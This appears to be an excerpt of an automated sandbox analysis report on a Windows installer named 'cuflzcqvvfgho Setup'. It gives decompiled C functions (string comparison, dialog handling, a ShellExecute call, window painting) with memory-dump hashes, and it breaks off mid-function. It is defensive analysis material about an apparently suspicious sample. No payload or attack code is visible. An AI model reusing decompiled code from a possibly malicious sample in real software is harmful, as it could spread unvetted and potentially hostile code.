                                            							_t228 = 0;
                                            							L32:
                                            							if(_t228 != 0) {
                                            								goto L78;
                                            							}
                                            							_t181 =  *(_t322 - 0x10);
                                            							if(_t181 ==  *(_t278 - 0x10)) {
                                            								_t228 = 0;
                                            								L43:
                                            								if(_t228 != 0) {
                                            									goto L78;
                                            								}
                                            								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
                                            									_t228 = 0;
                                            									L54:
                                            									if(_t228 != 0) {
                                            										goto L78;
                                            									}
                                            									_t183 =  *(_t322 - 8);
                                            									if(_t183 ==  *(_t278 - 8)) {
                                            										_t228 = 0;
                                            										L65:
                                            										if(_t228 != 0) {
                                            											goto L78;
                                            										}
                                            										_t184 =  *(_t322 - 4);
                                            										if(_t184 ==  *(_t278 - 4)) {
                                            											_t228 = 0;
                                            											L76:
                                            											if(_t228 == 0) {
                                            												_t228 = 0;
                                            											}
                                            											goto L78;
                                            										}
                                            										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
                                            										if(_t281 == 0) {
                                            											L69:
                                            											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
                                            											if(_t283 == 0) {
                                            												L71:
                                            												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
                                            												if(_t285 == 0) {
                                            													L73:
                                            													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
                                            													if(_t228 != 0) {
                                            														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                            													}
                                            													goto L76;
                                            												}
                                            												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
                                            												if(_t228 != 0) {
                                            													goto L78;
                                            												}
                                            												goto L73;
                                            											}
                                            											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
                                            											if(_t228 != 0) {
                                            												goto L78;
                                            											}
                                            											goto L71;
                                            										}
                                            										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
                                            										if(_t228 != 0) {
                                            											goto L78;
                                            										}
                                            										goto L69;
                                            									}
                                            									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
                                            									if(_t287 == 0) {
                                            										L58:
                                            										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
                                            										if(_t289 == 0) {
                                            											L60:
                                            											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
                                            											if(_t291 == 0) {
                                            												L62:
                                            												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
                                            												if(_t228 != 0) {
                                            													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                            												}
                                            												goto L65;
                                            											}
                                            											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
                                            											if(_t228 != 0) {
                                            												goto L78;
                                            											}
                                            											goto L62;
                                            										}
                                            										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
                                            										if(_t228 != 0) {
                                            											goto L78;
                                            										}
                                            										goto L60;
                                            									}
                                            									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
                                            									if(_t228 != 0) {
                                            										goto L78;
                                            									}
                                            									goto L58;
                                            								}
                                            								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
                                            								if(_t293 == 0) {
                                            									L47:
                                            									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
                                            									if(_t295 == 0) {
                                            										L49:
                                            										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
                                            										if(_t297 == 0) {
                                            											L51:
                                            											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
                                            											if(_t228 != 0) {
                                            												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                            											}
                                            											goto L54;
                                            										}
                                            										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
                                            										if(_t228 != 0) {
                                            											goto L78;
                                            										}
                                            										goto L51;
                                            									}
                                            									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
                                            									if(_t228 != 0) {
                                            										goto L78;
                                            									}
                                            									goto L49;
                                            								}
                                            								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
                                            								if(_t228 != 0) {
                                            									goto L78;
                                            								}
                                            								goto L47;
                                            							}
                                            							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
                                            							if(_t299 == 0) {
                                            								L36:
                                            								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
                                            								if(_t301 == 0) {
                                            									L38:
                                            									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
                                            									if(_t303 == 0) {
                                            										L40:
                                            										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
                                            										if(_t228 != 0) {
                                            											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                            										}
                                            										goto L43;
                                            									}
                                            									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
                                            									if(_t228 != 0) {
                                            										goto L78;
                                            									}
                                            									goto L40;
                                            								}
                                            								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
                                            								if(_t228 != 0) {
                                            									goto L78;
                                            								}
                                            								goto L38;
                                            							}
                                            							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
                                            							if(_t228 != 0) {
                                            								goto L78;
                                            							}
                                            							goto L36;
                                            						}
                                            						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
                                            						if(_t305 == 0) {
                                            							L25:
                                            							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
                                            							if(_t307 == 0) {
                                            								L27:
                                            								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
                                            								if(_t309 == 0) {
                                            									L29:
                                            									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
                                            									if(_t228 != 0) {
                                            										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                            									}
                                            									goto L32;
                                            								}
                                            								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
                                            								if(_t228 != 0) {
                                            									goto L78;
                                            								}
                                            								goto L29;
                                            							}
                                            							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
                                            							if(_t228 != 0) {
                                            								goto L78;
                                            							}
                                            							goto L27;
                                            						}
                                            						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
                                            						if(_t228 != 0) {
                                            							goto L78;
                                            						}
                                            						goto L25;
                                            					}
                                            					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
                                            					if(_t311 == 0) {
                                            						L14:
                                            						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
                                            						if(_t313 == 0) {
                                            							L16:
                                            							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
                                            							if(_t315 == 0) {
                                            								L18:
                                            								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
                                            								if(_t228 != 0) {
                                            									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                            								}
                                            								goto L21;
                                            							}
                                            							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
                                            							if(_t228 != 0) {
                                            								goto L78;
                                            							}
                                            							goto L18;
                                            						}
                                            						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
                                            						if(_t228 != 0) {
                                            							goto L78;
                                            						}
                                            						goto L16;
                                            					}
                                            					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
                                            					if(_t228 != 0) {
                                            						goto L78;
                                            					}
                                            					goto L14;
                                            				}
                                            				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                            				if(_t317 == 0) {
                                            					L3:
                                            					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
                                            					if(_t319 == 0) {
                                            						L5:
                                            						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
                                            						if(_t321 == 0) {
                                            							L7:
                                            							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
                                            							if(_t228 != 0) {
                                            								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                            							}
                                            							goto L10;
                                            						}
                                            						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
                                            						if(_t228 != 0) {
                                            							goto L78;
                                            						}
                                            						goto L7;
                                            					}
                                            					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
                                            					if(_t228 != 0) {
                                            						goto L78;
                                            					}
                                            					goto L5;
                                            				}
                                            				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
                                            				if(_t228 != 0) {
                                            					goto L78;
                                            				}
                                            				goto L3;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                            • Instruction ID: 9cc47b3e4207d1c9c5e7bb75d3240e0f2996182cd367a8d02e758e9a829ee964
                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                            • Instruction Fuzzy Hash: ACC172722155930AFF4DC679C83413FBAE2AB966F132B176DD4B2CB1C9EE24C524D620
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5293296d014792587c706e37fcf044dce698dfff6e30ee3ee6989ff02b958863
                                            • Instruction ID: 99c4f2a2031ce123b29a1b8f6f93d6339598118fda98ccda501ab601ec6de06b
                                            • Opcode Fuzzy Hash: 5293296d014792587c706e37fcf044dce698dfff6e30ee3ee6989ff02b958863
                                            • Instruction Fuzzy Hash: 9FB1125585D2EDADDB06CBF941643FDBFB05E26102F0841CAE4E5E6283C43A938EDB21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 556826cc9d0fc269208a3416c678c218f41ce2427c26daa7b9936f0869e52dbb
                                            • Instruction ID: 0aafcfe09f8af5d77c87e1b1d222ca6024ad1592f41e8b48fb2c36ff6c638824
                                            • Opcode Fuzzy Hash: 556826cc9d0fc269208a3416c678c218f41ce2427c26daa7b9936f0869e52dbb
                                            • Instruction Fuzzy Hash: A4A1035585D2EDADDB06CBF941643FCBFB05E26102F0845CAE0E5E6283C43A938EDB21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                            • Instruction ID: a5f5cc404345051d9a3d43732892c5c43a2385a91314192d1658d7f645f45817
                                            • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                            • Instruction Fuzzy Hash: 0111C272A10209AFCB10DBAAD8888AEF7FDEF466D4B5540A5F804DB214E774DEC0C660
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                            • Instruction ID: f4d788da18cf8e267c38a3c1811d86f470bc5a631a0a0da5908c50b93dabbf40
                                            • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                            • Instruction Fuzzy Hash: FAE092357645049FCB44CBA8CC41D55B3F4EB09230B114290FC15CB3E0EA34FE80D650
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                            • Instruction ID: 2df1a6d1e3cca68c9d16f3148c796fc1ccc26e8a365bcac769081ee74b5b76f8
                                            • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                            • Instruction Fuzzy Hash: 47E08C3A7146508BC360DB59C980942F3F9FB8A2F072A486AEC89DB751C230FD808A90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                            • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                            • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                            • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E00403F9C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                            				char _v8;
                                            				signed int _v12;
                                            				void* _v16;
                                            				struct HWND__* _t52;
                                            				intOrPtr _t71;
                                            				intOrPtr _t85;
                                            				long _t86;
                                            				int _t98;
                                            				struct HWND__* _t99;
                                            				signed int _t100;
                                            				intOrPtr _t107;
                                            				intOrPtr _t109;
                                            				int _t110;
                                            				signed int* _t112;
                                            				signed int _t113;
                                            				char* _t114;
                                            				CHAR* _t115;
                                            
                                            				if(_a8 != 0x110) {
                                            					if(_a8 != 0x111) {
                                            						L11:
                                            						if(_a8 != 0x4e) {
                                            							if(_a8 == 0x40b) {
                                            								 *0x420518 =  *0x420518 + 1;
                                            							}
                                            							L25:
                                            							_t110 = _a16;
                                            							L26:
                                            							return E00403EBB(_a8, _a12, _t110);
                                            						}
                                            						_t52 = GetDlgItem(_a4, 0x3e8);
                                            						_t110 = _a16;
                                            						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                            							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                            							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                            							_v12 = _t100;
                                            							_v16 = _t109;
                                            							_v8 = 0x422ee0;
                                            							if(_t100 - _t109 < 0x800) {
                                            								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                            								SetCursor(LoadCursorA(0, 0x7f02));
                                            								_t40 =  &_v8; // 0x422ee0
                                            								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                                            								SetCursor(LoadCursorA(0, 0x7f00));
                                            								_t110 = _a16;
                                            							}
                                            						}
                                            						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                            							goto L26;
                                            						} else {
                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                            								SendMessageA( *0x423f48, 0x111, 1, 0);
                                            							}
                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                            								SendMessageA( *0x423f48, 0x10, 0, 0);
                                            							}
                                            							return 1;
                                            						}
                                            					}
                                            					if(_a12 >> 0x10 != 0 ||  *0x420518 != 0) {
                                            						goto L25;
                                            					} else {
                                            						_t112 =  *0x41fd08 + 0x14;
                                            						if(( *_t112 & 0x00000020) == 0) {
                                            							goto L25;
                                            						}
                                            						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                            						E00403E76(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                            						E00404227();
                                            						goto L11;
                                            					}
                                            				}
                                            				_t98 = _a16;
                                            				_t113 =  *(_t98 + 0x30);
                                            				if(_t113 < 0) {
                                            					_t107 =  *0x42371c; // 0x666dd3
                                            					_t113 =  *(_t107 - 4 + _t113 * 4);
                                            				}
                                            				_t71 =  *0x423f78; // 0x6656e0
                                            				_push( *((intOrPtr*)(_t98 + 0x34)));
                                            				_t114 = _t113 + _t71;
                                            				_push(0x22);
                                            				_a16 =  *_t114;
                                            				_v12 = _v12 & 0x00000000;
                                            				_t115 = _t114 + 1;
                                            				_v16 = _t115;
                                            				_v8 = E00403F68;
                                            				E00403E54(_a4);
                                            				_push( *((intOrPtr*)(_t98 + 0x38)));
                                            				_push(0x23);
                                            				E00403E54(_a4);
                                            				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                            				E00403E76( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                            				_t99 = GetDlgItem(_a4, 0x3e8);
                                            				E00403E89(_t99);
                                            				SendMessageA(_t99, 0x45b, 1, 0);
                                            				_t85 =  *0x423f50; // 0x661638
                                            				_t86 =  *(_t85 + 0x68);
                                            				if(_t86 < 0) {
                                            					_t86 = GetSysColor( ~_t86);
                                            				}
                                            				SendMessageA(_t99, 0x443, 0, _t86);
                                            				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                            				 *0x41f4fc =  *0x41f4fc & 0x00000000;
                                            				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                            				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                            				 *0x420518 =  *0x420518 & 0x00000000;
                                            				return 0;
                                            			}

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                            • String ID: N$open$.B
                                            • API String ID: 3615053054-720656042
                                            • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                            • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                                            • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                            • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: File$ErrorLast$View$CloseCreateHandleMappingSize$PointerUnmap
                                            • String ID:
                                            • API String ID: 2750380209-0
                                            • Opcode ID: 060b7b50325a49fbfb4ba781b538767780c96e33ced6d7a07db1b916ad805c3a
                                            • Instruction ID: 177151cf2cf71aa043f14ca26211adcba27faaf0a2f7b92520ec25653c0f1c6f
                                            • Opcode Fuzzy Hash: 060b7b50325a49fbfb4ba781b538767780c96e33ced6d7a07db1b916ad805c3a
                                            • Instruction Fuzzy Hash: 80E18FB49087458FE760DF28C58875BBBE4FB88354F10892EE89987394DB759548CF43
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                            				struct tagLOGBRUSH _v16;
                                            				struct tagRECT _v32;
                                            				struct tagPAINTSTRUCT _v96;
                                            				struct HDC__* _t70;
                                            				struct HBRUSH__* _t87;
                                            				struct HFONT__* _t94;
                                            				long _t102;
                                            				intOrPtr _t115;
                                            				signed int _t126;
                                            				struct HDC__* _t128;
                                            				intOrPtr _t130;
                                            
                                            				if(_a8 == 0xf) {
                                            					_t130 =  *0x423f50; // 0x661638
                                            					_t70 = BeginPaint(_a4,  &_v96);
                                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                            					_a8 = _t70;
                                            					GetClientRect(_a4,  &_v32);
                                            					_t126 = _v32.bottom;
                                            					_v32.bottom = _v32.bottom & 0x00000000;
                                            					while(_v32.top < _t126) {
                                            						_a12 = _t126 - _v32.top;
                                            						asm("cdq");
                                            						asm("cdq");
                                            						asm("cdq");
                                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                            						_t87 = CreateBrushIndirect( &_v16);
                                            						_v32.bottom = _v32.bottom + 4;
                                            						_a16 = _t87;
                                            						FillRect(_a8,  &_v32, _t87);
                                            						DeleteObject(_a16);
                                            						_v32.top = _v32.top + 4;
                                            					}
                                            					if( *(_t130 + 0x58) != 0xffffffff) {
                                            						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                            						_a16 = _t94;
                                            						if(_t94 != 0) {
                                            							_t128 = _a8;
                                            							_v32.left = 0x10;
                                            							_v32.top = 8;
                                            							SetBkMode(_t128, 1);
                                            							SetTextColor(_t128,  *(_t130 + 0x58));
                                            							_a8 = SelectObject(_t128, _a16);
                                            							DrawTextA(_t128, "cuflzcqvvfgho Setup", 0xffffffff,  &_v32, 0x820);
                                            							SelectObject(_t128, _a8);
                                            							DeleteObject(_a16);
                                            						}
                                            					}
                                            					EndPaint(_a4,  &_v96);
                                            					return 0;
                                            				}
                                            				_t102 = _a16;
                                            				if(_a8 == 0x46) {
                                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                            					_t115 =  *0x423f48; // 0x5024c
                                            					 *((intOrPtr*)(_t102 + 4)) = _t115;
                                            				}
                                            				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                            			}

                                            APIs
                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32 ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32 ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,?), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextA.USER32(00000000,cuflzcqvvfgho Setup,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F$cuflzcqvvfgho Setup
                                            • API String ID: 941294808-738713911
                                            • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                            • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                                            • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                            • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E004058E6(void* __eflags) {
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr* _t15;
                                            				long _t16;
                                            				intOrPtr _t18;
                                            				int _t20;
                                            				void* _t28;
                                            				long _t29;
                                            				intOrPtr* _t37;
                                            				int _t43;
                                            				void* _t44;
                                            				long _t47;
                                            				CHAR* _t49;
                                            				void* _t51;
                                            				void* _t53;
                                            				intOrPtr* _t54;
                                            				void* _t55;
                                            				void* _t56;
                                            
                                            				_t15 = E00405F28(2);
                                            				_t49 =  *(_t55 + 0x18);
                                            				if(_t15 != 0) {
                                            					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                            					if(_t20 != 0) {
                                            						L16:
                                            						 *0x423fd0 =  *0x423fd0 + 1;
                                            						return _t20;
                                            					}
                                            				}
                                            				 *0x4226c8 = 0x4c554e;
                                            				if(_t49 == 0) {
                                            					L5:
                                            					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422140, 0x400);
                                            					if(_t16 != 0 && _t16 <= 0x400) {
                                            						_t43 = wsprintfA(0x421d40, "%s=%s\r\n", 0x4226c8, 0x422140);
                                            						_t18 =  *0x423f50; // 0x661638
                                            						_t56 = _t55 + 0x10;
